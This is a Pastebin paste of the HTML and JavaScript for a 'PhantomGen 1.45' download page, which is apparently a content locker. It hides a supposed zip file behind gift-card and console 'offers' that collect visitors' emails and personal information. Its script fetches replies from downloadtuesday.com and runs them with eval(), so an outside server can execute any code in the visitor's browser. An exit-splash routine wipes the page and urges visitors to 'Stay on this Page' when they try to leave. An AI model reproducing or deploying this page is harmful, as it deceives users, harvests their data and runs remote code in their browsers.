Advertisement
Guest User

phantomgen

a guest
Mar 29th, 2017
576
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 30.35 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html lang="en" style="height:100%;">
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5. <meta name="googlebot" content="noindex">
  6. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
  7. <script type="text/javascript" src="https://downloadtuesday.com/jquery.tipsy.js"></script>
  8. <link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0-rc1/css/bootstrap.min.css">
  9. <link rel="stylesheet" href="//downloadtuesday.com/bootstrap3/css/bootstrap-glyphicons.css">
  10. <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
  11. <link rel="icon" href="/favicon.ico" type="image/x-icon">
  12. <script language="JavaScript">
  13. $(function() {
  14. $('.tip_over_link').tipsy({offset: -3,gravity: 'w',fade: false,html: true,opacity: 0.95});
  15. });
  16. var timed_function;
  17. function Start_Ajax(){
  18. clearTimeout(timed_function);
  19. $('#offerlst').hide();
  20. $('#offerwait').show();
  21. timed_function = setTimeout("chkld();",20000);
  22. }
  23. function Back_Ajax(){
  24. $('#offerwait').hide();
  25. $('#offerlst').fadeIn('slow');
  26. }
  27. function chkld(){
  28. $.ajax({
  29. type: "POST",
  30. crossDomain: true,
  31. data: "a_t=900&lid=651412",
  32. url: "https://downloadtuesday.com/ajax_check_url.php",
  33. success: function(msg){
  34. eval(msg);
  35. }
  36. });
  37. }
  38. function completed(url){
  39. top.location = url;
  40. }
  41. </script>
  42. <link href='https://fonts.googleapis.com/css?family=Lato' rel='stylesheet' type='text/css'>
  43. <style>
  44. /* ===== Tipsy ===== */
  45.  
  46. .tipsy { padding: 4px; font-size: 11px; position: absolute; z-index: 100000; }
  47.  
  48. .tipsy-inner { padding: 5px 7px 5px 8px; background-color: black; color: white; max-width: 300px; text-align: center; }
  49. .tipsy-inner { border-radius: 3px; -moz-border-radius:3px; -webkit-border-radius:3px; }
  50. .tipsy-arrow { position: absolute; background: url('https://downloadtuesday.com/images/tipsy.gif') no-repeat top left; width: 9px; height: 5px; }
  51. .tipsy-w { margin-left: 5px; }
  52. .tipsy-w .tipsy-arrow { top: 50%; margin-top: -4px; left: 0; width: 5px; height: 9px; }
  53.  
  54. body{
  55. background-color:white;
  56. font-size: 14px;
  57. }
  58.  
  59. .offerlst{
  60.  
  61. background-color:rgba(239,239,239,0.5);
  62.  
  63. border:1px solid white;
  64. padding:20px;
  65. border-radius:8px;
  66.  
  67. min-height: 80px;
  68. margin-bottom: 8px;
  69. font-size: 16px;
  70. }
  71. .link_a, .link_a:link{
  72.  
  73.  
  74. background-color: #F5F5F5;
  75. background-image: linear-gradient(to bottom, #FFFFFF, #E6E6E6);
  76. background-repeat: repeat-x;
  77. border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) #B3B3B3;
  78. border-image: none;
  79. border-radius: 4px 4px 4px 4px;
  80. border-style: solid;
  81. border-width: 1px;
  82. box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px rgba(0, 0, 0, 0.05);
  83. color: #333333;
  84. cursor: pointer;
  85. display: inline-block;
  86. font-size: 14px;
  87. line-height: 20px;
  88. margin-bottom: 0;
  89. padding: 4px 12px;
  90. text-align: center;
  91. text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75);
  92. vertical-align: middle;
  93.  
  94. font-weight: normal;
  95. text-decoration:none;
  96.  
  97.  
  98.  
  99. }
  100.  
  101. .link_a:hover{
  102. background-position: 0 -15px;
  103. transition: background-position 0.1s linear 0s;
  104. }
  105. .each_p_elm{
  106. margin: 3px 0;
  107.  
  108. padding: 3px;
  109. white-space:nowrap;
  110. }
  111.  
  112. .features {
  113. width:94.2%;
  114. margin:0 auto;
  115. height:140px;
  116. }
  117. .featurewrap {
  118. height:170px;
  119. padding-left:80px;
  120. border-radius: 4px;
  121. width:76%;
  122. margin:0 auto;
  123. }
  124. .featurewrap ul {
  125. list-style-image: url('http://cheatlib.com/images/check.png');
  126. }
  127. .featurewrap li {
  128. padding:4px;
  129. }
  130. #d1 {
  131. float:left;
  132. width:353px;
  133. height:151px;
  134.  
  135. }
  136. #d2 {
  137. width:353px;
  138. height:151px;
  139. float:right;
  140.  
  141. }
  142. .sarkanais {
  143. margin-bottom:25px;
  144. height:30px;
  145. margin:0 auto;
  146. width:93.8%;
  147. text-align:center;
  148. font-size:23px;
  149. color:#5d5f60;
  150. font-weight:800;
  151. text-transform: uppercase;
  152. }
  153.  
  154. .navbar {
  155. margin:0px;
  156. border-radius:0px;
  157. }
  158. .current {
  159. background-color: #4CAF50;
  160.  
  161. }
  162. .navbar li {
  163. float:left;
  164. border-right: 1px solid #bbb;
  165. }
  166. .navbar a {
  167. text-decoration: none;
  168. }
  169. .social {
  170. padding:0px;
  171. margin:0px;
  172. display:inline;
  173. }
  174. .navbar li a {
  175. display: block;
  176. color: #666;
  177. text-align: center;
  178. padding: 14px 16px;
  179. text-decoration: none;
  180.  
  181. }
  182. .navbar ul {
  183. list-style-type: none;
  184. margin: 0;
  185. padding: 0;
  186. overflow: hidden;
  187. border: 1px solid #e7e7e7;
  188. background-color: #f3f3f3;
  189. }
  190. .navbar li a:hover {
  191. background-color: #ddd;
  192. }
  193. .navbar li:last-child {
  194. border-right: none;
  195. }
  196. .featurelista {
  197. width:25%;
  198. padding-top:0px;
  199. height:60%;
  200. float:right;
  201. }
  202. .featurelistb {
  203. width:24.69%;
  204. padding-top:0px;
  205. height:60%;
  206. float:left;
  207. }
  208. .featurename {
  209. width:100%;
  210. height:0px;
  211. text-align: center;
  212. font-size: 30px;
  213. }
  214. .featuretext {
  215. width:100%;
  216. height:0px;
  217. padding-top:10px;
  218. }
  219. .featurelistb, .featurelista ul {
  220. list-style-image: url('http://cheatlib.com/images/check.png');
  221. }
  222. .featurelistb li {
  223. padding-bottom:6px;
  224. }
  225. .featurelista li {
  226. padding-bottom:6px;
  227. }
  228. .download-info {
  229. font-size: 23px;
  230. line-height: 25px;
  231. color: #2f6fad;
  232. white-space: nowrap;
  233. padding-top:8px;
  234. font-weight:bold; margin: 0;
  235. padding: 0;
  236. }
  237. .downloadoffers {
  238. height:220px;
  239. width:100%;
  240. border:1 px solid black;
  241. }
  242. .dl_button { text-shadow: #591717 1px 1px 1px;
  243. font-weight: 800;
  244. transition: all 250ms ease-in-out;
  245. border: 2px solid #2f6fad;
  246. border-radius:30px;
  247. font-size: 16px;
  248. letter-spacing: 2px;
  249. color: #ffffff;
  250. background: #2f6fad;
  251.  
  252. border-color: #2f6fad;
  253. width:400px;
  254. height:60px;
  255. font-size:16px;
  256. padding:10px;
  257. }
  258.  
  259. .dl_button:hover {
  260. background-color: white;
  261. border-color: #2f6fad;
  262. color:#2f6fad;
  263. line-height: 30px;
  264. }
  265.  
  266. .downloadwraps {
  267. height:160px;
  268. width:550px;
  269. margin:0 auto;
  270. }
  271. #filemd5 {
  272. padding:0px;
  273. color: #9C9C9C;
  274. font-size: 14px;
  275. white-space: nowrap;
  276. overflow: visible;
  277. margin: 0px;
  278. }
  279. #file-size {
  280. margin-top: 0px;
  281. color: #5D5D5D;
  282. font-size: 18px;
  283. font-weight:500;
  284. margin: 0px;
  285. padding: 0px;
  286. }
  287. .wrapleft {
  288. float:left;
  289. height:100%;
  290. width:25%;
  291. background:url(http://cheatlib.com/images/file-zip3.png)no-repeat center center;
  292. }
  293. .wrapright {
  294. padding-top:45px;
  295. float:right;
  296. height:100%;
  297. width:75%;
  298.  
  299. }
  300.  
  301.  
  302.  
  303. .download-info {
  304. font-size: 23px;
  305. line-height: 25px;
  306. color: #2f6fad;
  307. white-space: nowrap;
  308. padding-top:8px;
  309. font-weight:bold; margin: 0;
  310. padding: 0;
  311. }
  312.  
  313.  
  314.  
  315. body {
  316. background:url('https://images.alphacoders.com/270/270063.jpg') center;
  317. padding:0px;margin:0px;
  318. background-color: #444349;
  319. font-family: 'Roboto', sans-serif;
  320. }
  321. #c1 {
  322. float:left;
  323. width:553px;
  324. height:311px;
  325. }
  326. #c2 {
  327. width:553px;
  328. height:311px;
  329. float:right;
  330. }
  331. .gallerywrap {
  332. margin:0 auto;
  333. width:1106px;
  334. height:311px;
  335. }
  336. .footerleft {
  337. float:left;
  338. height:300px;
  339. width:340px;
  340. position: relative;
  341. }
  342. .footerleft ul {
  343.  
  344. list-style-type: none;
  345. }
  346. .footerleft a {
  347.  
  348. color:white;
  349. text-decoration: none;
  350. }
  351. .footerleft li {
  352. padding-bottom: 8px;
  353. }
  354.  
  355. .footerright {
  356. float:right;
  357. height:300px;
  358. width:336px;
  359. }
  360. .main {
  361. background:white;
  362. height:570px;
  363. box-shadow: 0px 0px 30px 3px rgba(0,0,0,0.12);
  364. padding:10px;
  365. }
  366. .wrapper {
  367. width:1200px;
  368. height:800px;
  369. margin: 0 auto;
  370.  
  371. }
  372. .banner {
  373. height:120px;
  374. }
  375. .banner img {
  376. display: block;
  377. margin:25px auto 25px auto;
  378. }
  379. </style>
  380. <title>RockerBoost - PhantomGen 1.45</title>
  381. </head>
  382. <body id="the_body" style="margin:0; height:100%; font-family: 'Lato', sans-serif;">
  383.  
  384. <!--Begin -->
  385.  
  386. <<link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet"></head>
  387.  
  388. <div class="wrapper"><div class="banner">
  389. <img src="http://rockerboost.com/wp-content/uploads/2017/03/rockerboost.png"></div>
  390. <div class="main"style="height:auto;min-height:320px;">
  391.  
  392. <div class="downloadwraps">
  393. <div class="wrapleft"></div><div class="wrapright">
  394. <p class="download-info">
  395.  
  396. PhantomGen 1.45(rockerboost.com).zip</p>
  397. <p id="file-size">File size: 2.58 MB</p><p id="filemd5" style="color:#5D5D5D;"><p style=" color:gray;font-weight:bold; display:inline;">Uploaded - </p> <p style=" color: #7faf1b;
  398. font-weight:bold; display:inline;"></p> Mar 29th, 2017
  399. </p>
  400.  
  401. </div>
  402. </div>
  403. <div class="downloadoffers">
  404. <center>
  405. <button onclick="$(this).hide(); $('#offerlst').show('slow');" type="button" class="btn btn-danger btn-large dl_button"><i class="glyphicon glyphicon-download-alt"></i> DOWNLOAD</button>
  406. <div id="offerlst" style="display:none;">
  407. <div class="offer_help_text" style="font-weight: bold;">Please complete a quick offer to download</div>
  408. <p class="each_p_elm" style="">
  409. <a class="tip_over_link link_a" title="Answer the question now for a chance to win." onclick="Start_Ajax();" target="_blank" href="https://downloadtuesday.com/show.php?cl=true&l=651412&u=28947&id=9791">Get a New Nintendo Switch! </a>
  410. </p>
  411. <p class="each_p_elm" style="">
  412. <a class="tip_over_link link_a" title="Enter your email now for a chance to win a $250 Taco Bell gift card." onclick="Start_Ajax();" target="_blank" href="https://downloadtuesday.com/show.php?cl=true&l=651412&u=28947&id=10679">Do You Like Taco Bell? </a>
  413. </p>
  414. <p class="each_p_elm" style="">
  415. <a class="tip_over_link link_a" title="Enter your information now to get started." onclick="Start_Ajax();" target="_blank" href="https://downloadtuesday.com/show.php?cl=true&l=651412&u=28947&id=7768">Get $1000 Amazon Gift Card for the Holidays! </a>
  416. </p>
  417. </div>
  418. <div id="offerwait" style="margin: 50px 0; font-size: 15px; display: none;">
  419. <p style="margin: 2px; ">
  420. <span onclick="Back_Ajax();" style="cursor:pointer;">
  421. <img style="vertical-align: middle;" src="https://downloadtuesday.com/images/back.png">
  422. <span style="text-decoration: underline; font-weight: bold;">Go Back and try a different offer.</span>
  423. </span><br/>
  424. <img style="vertical-align: middle;" src="https://downloadtuesday.com/images/search.gif"> Waiting for offer completion..
  425. </p>
  426. </div>
  427. </center>
  428.  
  429. </div>
  430. <p style="text-align: center;">After completion of one quick offer file will be unlocked</p>
  431. </div></div></div>
  432. <!--End -->
  433.  
  434. <div id="link_terms" title="Terms" style="z-index: 9; display:none; width:50%; position:absolute; left: 25px; top:20px; overflow: visible !important;">
  435. <div style="font-size:11px; position: relative; padding:5px; background-color:white; color:black; border:2px solid black; border-radius: 5px;">
  436. <center><button onclick="$('#link_terms').hide('fast');">Close Window</button></center>
  437. <br/>
  438. <br/>
  439. <strong>Terms and Conditions of Use</strong><br/>
  440. By accessing this site, you agree to be bound by these Terms and Conditions of Use, all applicable laws and regulations, and agree that you are responsible for compliance with any applicable local laws. If you do not agree with any of these terms, you are prohibited from using or accessing this site. The materials contained in this web site are protected by applicable copyright and trade mark laws.
  441. <br/>
  442. <br/>
  443. Permission is granted to temporarily download one copy of the materials (information or software) on this site for personal, non-commercial viewing only. This is the grant of a license, not a transfer of title, and under this license you may not:
  444. <br/>
  445. modify or copy the materials;<br/>
  446. use the materials for any commercial purpose, or for any public display (commercial or non-commercial);<br/>
  447. attempt to decompile or reverse engineer any software contained on this site;<br/>
  448. remove any copyright or other proprietary notations from the materials; or
  449. transfer the materials to another person or "mirror" the materials on any other server.<br/>
  450. This license shall automatically terminate if you violate any of these restrictions and may be terminated by site at any time. Upon terminating your viewing of these materials or upon the termination of this license, you must destroy any downloaded materials in your possession whether in electronic or printed format.
  451. <br/>
  452. <br/>
  453. Disclaimer:<br/>
  454. The materials on this site are provided "as is". this site makes no warranties, expressed or implied, and hereby disclaims and negates all other warranties, including without limitation, implied warranties or conditions of merchantability, or non-infringement of intellectual property or other violation of rights. Further, this site does not warrant or make any representations concerning the accuracy, likely results, or reliability of the use of the materials on its Internet web site or otherwise relating to such materials or on any sites linked to this site.
  455. <br/>
  456. <br/>
  457. Limitations:<br/>
  458. In no event shall this site or its suppliers be liable for any damages (including, without limitation, damages for loss of data or profit, or due to business interruption,) arising out of the use or inability to use the materials on this site, even if this site or an authorized representative has been notified orally or in writing of the possibility of such damage. Because some jurisdictions do not allow limitations on implied warranties, or limitations of liability for consequential or incidental damages, these limitations may not apply to you.
  459. <br/>
  460. <br/>
  461. Revisions:<br/>
  462. The materials appearing on this site could include technical, typographical, or photographic errors. this site does not warrant that any of the materials on its web site are accurate, complete, or current. this site may make changes to the materials contained on its web site at any time without notice. this site does not, however, make any commitment to update the materials.
  463. <br/>
  464. <br/>
  465. Links:<br/>
  466. this site has not reviewed all of the sites linked to its Internet web site and is not responsible for the contents of any such linked site. The inclusion of any link does not imply endorsement by this site. Use of any such linked web site is at the user's own risk.
  467. <br/>
  468. <br/>
  469. Terms of Use Modifications:<br/>
  470. This site may revise these terms of use for its web site at any time without notice. By using this web site you are agreeing to be bound by the then current version of these Terms and Conditions of Use.
  471. <br/><br/>
  472. Governing Law:<br/>
  473. Any claim relating to this site shall be governed by the laws of the State of Nevada without regard to its conflict of law provisions.
  474. <br/><br/>
  475. <center><button onclick="$('#link_terms').hide('fast');">Close Window</button></center>
  476. </div>
  477. </div>
  478. <div id="link_privacy" title="Privacy" style="z-index: 9; display:none; width:50%; position:absolute; left: 25px; top:20px; overflow: visible !important;">
  479. <div style="font-size:11px; position: relative; padding:5px; background-color:white; color:black; border:2px solid black; border-radius: 5px;">
  480. <center><button onclick="$('#link_privacy').hide('fast');">Close Window</button></center>
  481. <br/>
  482. <br/>
  483. <strong>Privacy Policy</strong><br/>
  484. <br/>
  485. Your privacy is important to us. Accordingly, we have developed this Policy in order for you to understand how we collect, use, communicate and disclose and make use of your personal information. The following outlines our privacy policy.
  486. <br/>
  487. Before or at the time of collecting personal information, we will identify the purposes for which information is being collected.<br/>
  488. We will collect and use personal information solely with the objective of fulfilling those purposes specified by us and for other compatible purposes, unless we obtain the consent of the individual concerned or as required by law.<br/>
  489. We will only retain personal information as long as necessary for the fulfillment of those purposes.<br/>
  490. We will collect personal information by lawful and fair means and, where appropriate, with the knowledge or consent of the individual concerned.<br/>
  491. Personal data should be relevant to the purposes for which it is to be used, and, to the extent necessary for those purposes, should be accurate, complete, and up-to-date.<br/>
  492. We will protect personal information by reasonable security safeguards against loss or theft, as well as unauthorized access, disclosure, copying, use or modification.<br/>
  493. We will make readily available to customers information about our policies and practices relating to the management of personal information.<br/>
  494. We are committed to conducting our business in accordance with these principles in order to ensure that the confidentiality of personal information is protected and maintained.
  495. <br/><br/>
  496. <center><button onclick="$('#link_privacy').hide('fast');">Close Window</button></center>
  497. </div>
  498. </div>
  499. <div id="link_dmca" title="DMCA" style="z-index: 9; display:none; width:50%; position:absolute; left: 25px; top:20px; overflow: visible !important;">
  500. <div style="font-size:11px; position: relative; padding:5px; background-color:white; color:black; border:2px solid black; border-radius: 5px;">
  501. <center><button onclick="$('#link_dmca').hide('fast');">Close Window</button></center>
  502. <br/>
  503. <br/>
  504. <strong>DMCA &amp; Compliance Policy</strong><br/><br/>
  505. <strong>We do not host any files or content on our servers</strong>! Please report copyright infringment in accordance with the details below:
  506. <br/><br/>
  507. It is our policy to respond to notices of alleged infringement that comply with the Digital Millennium Copyright Act and other applicable intellectual property laws. Responses may include removing or disabling access to material claimed to be the subject of infringing activity and/or terminating subscribers. If we remove or disable access in response to such a notice, we will make a good-faith attempt to contact the owner or administrator of the affected site or content so that they may make a counter notification pursuant to sections 512(g)(2) and (3) of that Act. It is our policy to document all notices of alleged infringement on which we act.
  508. <br/><br/>
  509. To file a notice of infringement with us, you must provide a digital notification via email that sets forth the items specified below. Please note that you may be liable for damages (including costs and attorneys' fees) if you materially misrepresent that a product or activity is infringing your copyrights. Accordingly, if you are not sure whether material available online infringes your copyright, we suggest that you first contact an attorney.
  510. <br/><br/>
  511. Your communication must include substantially all of the following:
  512. <br/><br/>
  513. A physical or electronic signature of a person authorized to act on behalf of the owner of an exclusive right that is allegedly infringed.<br/>
  514. Identify in sufficient detail the location of copyrighted work that you believe has been infringed upon or other information sufficient to specify the copyrighted work being infringed. If multiple copyrighted works at a single online site are covered by a single notification, a representative list of such works at that site.<br/>
  515. Identification of the material that is claimed to be infringing or to be the subject of infringing activity and that is to be removed or access to which is to be disabled, and information reasonably sufficient to permit us to locate the material.<br/>
  516. Information reasonably sufficient to permit us to contact the complaining party, such as an address, telephone number, and, if available, an electronic mail address at which the complaining party may be contacted.<br/>
  517. The following statement: "I have a good faith belief that use of the material in the manner complained of is not authorized by the copyright owner, its agent, or the law."<br/>
  518. The following statement: "I swear, under penalty of perjury, that the information in the notification is accurate, and that I am the copyright owner or am authorized to act on behalf of the owner of an exclusive right that is allegedly infringed."<br/>
  519. Please contact us to report any misleading advertising, fake content, SPAM, copyright infringement, or other abuse.
  520. <br/><br/>
  521. <center><button onclick="$('#link_dmca').hide('fast');">Close Window</button></center>
  522. </div>
  523. </div>
  524.  
  525. <script type="text/javascript">
  526. var jquery_loaded = true;
  527. var bypass = false;
  528.  
  529. var exit_ready = false;
  530. function load_slidepage(){
  531. if(exit_ready==false){
  532. exit_ready = true;
  533. jQuery('#the_box').html('');
  534. jQuery('#the_box').animate({
  535. height: '0px'
  536. }, 500, function() {
  537. jQuery('#main_div').hide();
  538. jQuery('#main_back').hide();
  539.  
  540. });
  541. }
  542. }
  543.  
  544. setTimeout('griplock()',1000);
  545.  
  546. function griplock(){
  547. if(jquery_loaded){
  548.  
  549. var exitsplashmessage = 'Click Stay on this Page';
  550. var exitsplashpage = 'https://downloadtuesday.com/welcome?pub=28947';
  551.  
  552. jQuery(document).ready(function(){
  553.  
  554. function addLoadEvent(func) {
  555. var oldonload = window.onload;
  556. if ( typeof window.onload != 'function') {
  557. window.onload = func;
  558. } else {
  559. window.onload = function() {
  560. if (oldonload) {
  561. oldonload();
  562. }
  563. func();
  564. }
  565. }
  566. }
  567.  
  568. function addClickEvent(a, i, func) {
  569. if ( typeof a[i].onclick != 'function') {
  570. a[i].onclick = func;
  571. }
  572. }
  573.  
  574.  
  575. var the_html = '<div id="main_div" style="display:block; width:100%; height:100%; position:absolute; z-index:2;">';
  576. if(jQuery.browser.mozilla){
  577. the_html += '<table height="100%"><tr valign="middle"><td style="vertical-align:middle;"><div id="the_box" style="background-color:white; height: 125px; margin-top:-105px; width:610px; border:1px solid white; border-radius:5px; -webkit-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);-moz-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75); box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);"><div style="text-align:center; padding:50px; font-weight:bold; font-size:18px; color:lightgrey;">Loading...</div><div style="position:absolute;"><div style="position:relative;left:330px; top:10px;"><div style="width: 0; height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 20px solid white;"></div><div style="color:white; position:absolute;"><div class="translate_text" style="padding:5px; border-radius:5px; background-color: black; width: 188px; position:relative; top: 10px; font-weight:bold; font-size:15px;">Click <i>"Stay on Page"</i> to Participate!</div></div></div></div></td></tr></table>';
  578. }else if(jQuery.browser.chrome){
  579. the_html += '<table height="100%"><tr valign="middle"><td style="vertical-align:middle;"><div id="the_box" style="background-color:white; height: 238px; margin-top:-95px; width:362px; border:1px solid white; border-radius:5px; -webkit-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);-moz-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75); box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);"><div style="text-align:center; padding:108px; font-weight:bold; font-size:18px; color:lightgrey;">Loading...</div><div style="position:absolute;"><div style="position:relative;left:270px; top:20px;"><div style="width: 0; height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 20px solid white;"></div><div style="color:white; position:absolute;"><div class="translate_text" style="padding:5px; border-radius:5px; background-color: black; width: 188px; position:relative; left: 20px; top: 10px; font-weight:bold; font-size:15px;">Click <i>"Stay on this Page"</i> to Participate!</div></div></div></div></td></tr></table>';
  580. }else if(jQuery.browser.msie){
  581. the_html += '<table height="100%"><tr valign="middle"><td style="vertical-align:middle;"><div id="the_box" style="background-color:white; height: 275px; margin-top:-165px; margin-left:15px; width:388px; border:1px solid white; border-radius:5px; -webkit-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);-moz-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75); box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);"><div style="text-align:center; padding:127px; font-weight:bold; font-size:18px; color:lightgrey;">Loading...</div><div style="position:absolute;"><div style="position:relative;left:145px; top:20px;"><div style="width: 0; height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 20px solid white;"></div><div style="color:white; position:absolute;"><div class="translate_text" style="padding:5px; border-radius:5px; background-color: black; width: 188px; position:relative; left: -8px; top: 10px; font-weight:bold; font-size:15px;">Click <i>"Stay on this Page"</i> to Participate!</div></div></div></div></td></tr></table>';
  582. }else if(jQuery.browser.safari && !jQuery.browser.chrome){
  583. the_html += '<table height="100%"><tr valign="middle"><td style="vertical-align:middle;"><div id="the_box" style="background-color:white; height: 275px; margin-top:-165px; margin-left:15px; width:388px; border:1px solid white; border-radius:5px; -webkit-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);-moz-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75); box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);"><div style="text-align:center; padding:127px; font-weight:bold; font-size:18px; color:lightgrey;">Loading...</div><div style="position:absolute;"><div style="position:relative;left:145px; top:20px;"><div style="width: 0; height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 20px solid white;"></div><div style="color:white; position:absolute;"><div class="translate_text" style="padding:5px; border-radius:5px; background-color: black; width: 188px; position:relative; left: -8px; top: 10px; font-weight:bold; font-size:15px;">Click <i>"Stay on this Page"</i> to Participate!</div></div></div></div></td></tr></table>';
  584. exitsplashmessage = 'Click Stay on Page.';
  585. }
  586. the_html += '</div><div id="main_back" style="display:block; width:100%; height:100%; position:absolute; background:#000000; opacity: 0.5;"></div>';
  587.  
  588. var theDiv = '<div onmouseover="load_slidepage();" id="ExitSplashDiv" style="display:block; width:100%; height:100%; position:absolute; margin-top:0px; margin-left:0px;" align="center">';
  589. theDiv = theDiv + the_html;
  590. theDiv = theDiv + '<iframe src="' + exitsplashpage + '" width="100%" height="100%" align="middle" frameborder="0"></iframe>';
  591. theDiv = theDiv + '</div>';
  592. theBody = document.body;
  593. if (!theBody) {
  594. theBody = document.getElementById("body");
  595. if (!theBody) {
  596. theBody = document.getElementsByTagName("body")[0];
  597. }
  598. }
  599. var PreventExitSplash = false;
  600. function DisableExitSplash() {
  601. PreventExitSplash = true;
  602. }
  603.  
  604. function EnableExitSplash() {
  605. PreventExitSplash = false;
  606. }
  607.  
  608. function DisplayExitSplash() {
  609. if(bypass == false){
  610. if (PreventExitSplash == false) {
  611. window.scrollTo(0, 0);
  612. PreventExitSplash = true;
  613. divtag = document.createElement("div");
  614. divtag.setAttribute("id", "ExitSplashMainOuterLayer");
  615. divtag.style.position = "absolute";
  616. divtag.style.width = "100%";
  617. divtag.style.height = "100%";
  618. divtag.style.zIndex = "99";
  619. divtag.style.left = "0px";
  620. divtag.style.top = "0px";
  621. divtag.innerHTML = theDiv;
  622. theBody.innerHTML = "";
  623. theBody.topMargin = "0px";
  624. theBody.rightMargin = "0px";
  625. theBody.bottomMargin = "0px";
  626. theBody.leftMargin = "0px";
  627. theBody.style.overflow = "hidden";
  628. theBody.appendChild(divtag);
  629. return exitsplashmessage;
  630. } else {
  631. PreventExitSplash = false;
  632. }
  633. }
  634. }
  635.  
  636. var a = document.getElementsByTagName('A');
  637. for (var i = 0; i < a.length; i++) {
  638. if (a[i].target !== '_blank') {
  639. addClickEvent(a, i, function() {
  640. PreventExitSplash = true;
  641. });
  642. } else {
  643. addClickEvent(a, i, function() {
  644. PreventExitSplash = false;
  645. });
  646. }
  647. }
  648. disablelinksfunc = function() {
  649. var a = document.getElementsByTagName('A');
  650. for (var i = 0; i < a.length; i++) {
  651. if (a[i].target !== '_blank') {
  652. addClickEvent(a, i, function() {
  653. PreventExitSplash = true;
  654. });
  655. } else {
  656. addClickEvent(a, i, function() {
  657. PreventExitSplash = false;
  658. });
  659. }
  660. }
  661. };
  662.  
  663. addLoadEvent(disablelinksfunc);
  664. window.onbeforeunload = DisplayExitSplash;
  665.  
  666.  
  667. });
  668.  
  669. }else{
  670. setTimeout('griplock()',1000);
  671. }
  672. }
  673.  
  674. var exit_ready = false;
  675. function load_slidepage(){
  676. if(exit_ready==false){
  677. exit_ready = true;
  678. jQuery('#the_box').html('');
  679. jQuery('#the_box').animate({
  680. height: '0px'
  681. }, 500, function() {
  682. jQuery('#main_div').hide();
  683. jQuery('#main_back').hide();
  684.  
  685. });
  686. }
  687. }
  688.  
  689. </script>
  690. </body>
  691. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement